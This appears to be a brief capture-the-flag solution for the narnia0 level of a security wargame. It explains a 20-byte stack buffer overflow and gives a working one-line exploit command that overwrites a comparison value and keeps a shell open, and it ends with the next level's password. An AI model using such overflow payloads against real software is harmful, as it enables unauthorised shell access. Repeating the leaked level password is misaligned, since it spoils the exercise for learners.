Simple buffer overflow.  20 byte buffer on stack that they read 24 bytes into,
and the value for comparison is right next to it on stack.

Need to run like this to keep the shell open:

```
$ (python <PATH/TO/SCRIPT.py>; cat -) | ./narnia0
```

Alternatively:

```
$ (python -c "print('a'*20 + '\xef\xbe\xad\xde')"; cat -) | ./narnia0

```

Password: efeidiedae
